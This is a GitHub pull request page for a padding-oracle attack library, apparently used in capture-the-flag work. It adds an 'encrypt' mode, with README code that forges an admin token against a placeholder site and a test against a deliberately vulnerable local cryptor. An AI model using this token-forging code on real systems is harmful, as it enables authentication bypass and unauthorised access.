-
Notifications
You must be signed in to change notification settings - Fork 3
Add encryption support #4
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Merged
djosix
merged 7 commits into
djosix:support-encryption
from
q3st1on:add-encryption-support
Nov 17, 2023
Merged
Changes from all commits
Commits
Show all changes
7 commits
Select commit
Hold shift + click to select a range
5c8581d
Add Hacky Encrypt mode
q3st1on 927e3a8
Added test
q3st1on a24acdf
Bugfixes
q3st1on 5fc4f43
Updated README
q3st1on ceda912
fixed readme typo
q3st1on d5d618d
Updated code
q3st1on 0a89f86
formatting issues
q3st1on File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -29,7 +29,9 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED | |
| 16 | 1m 20s | | ||
| 64 | 56s | | ||
|
||
## How to Use | ||
## How to Use | ||
|
||
### Decryption | ||
|
||
To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`: | ||
|
||
|
@@ -64,6 +66,38 @@ plaintext = padding_oracle( | |
) | ||
``` | ||
|
||
### Encryption | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Nit: Needs an extra line above and below. |
||
|
||
To illustrate the usage, consider an example of forging a token for `https://vulnerable.website/api/?token=<.....>` : | ||
|
||
```python | ||
from padding_oracle import padding_oracle, base64_encode, base64_decode | ||
import requests | ||
|
||
sess = requests.Session() # use connection pool | ||
url = 'https://vulnerable.website/api/' | ||
|
||
def oracle(ciphertext: bytes): | ||
resp = sess.get(url, params={'token': base64_encode(ciphertext)}) | ||
|
||
if 'failed' in resp.text: | ||
return False # e.g. token decryption failed | ||
elif 'success' in resp.text: | ||
return True | ||
else: | ||
raise RuntimeError('unexpected behavior') | ||
|
||
payload: bytes =b"{'username':'admin'}" | ||
|
||
ciphertext = padding_oracle( | ||
payload, | ||
block_size = 16, | ||
oracle = oracle, | ||
num_threads = 16, | ||
mode = 'encrypt' | ||
) | ||
``` | ||
|
||
In addition, the package provides PHP-like encoding/decoding functions: | ||
|
||
```python | ||
|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,3 +1,4 @@ | ||
from cryptography.hazmat.primitives import padding | ||
from padding_oracle import padding_oracle | ||
from .cryptor import VulnerableCryptor | ||
|
||
|
@@ -14,6 +15,18 @@ def test_padding_oracle_basic(): | |
|
||
assert decrypted == plaintext | ||
|
||
def test_padding_oracle_encryption(): | ||
cryptor = VulnerableCryptor() | ||
|
||
plaintext = b'the quick brown fox jumps over the lazy dog' | ||
ciphertext = cryptor.encrypt(plaintext) | ||
|
||
encrypted = padding_oracle(plaintext, cryptor.block_size, | ||
cryptor.oracle, 4, null_byte=b'?', mode='encrypt') | ||
decrypted = cryptor.decrypt(encrypted) | ||
|
||
assert decrypted == plaintext | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. It will be better to write |
||
|
||
if __name__ == '__main__': | ||
test_padding_oracle_basic() | ||
test_padding_oracle_encryption() |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Uh oh!
There was an error while loading. Please reload this page.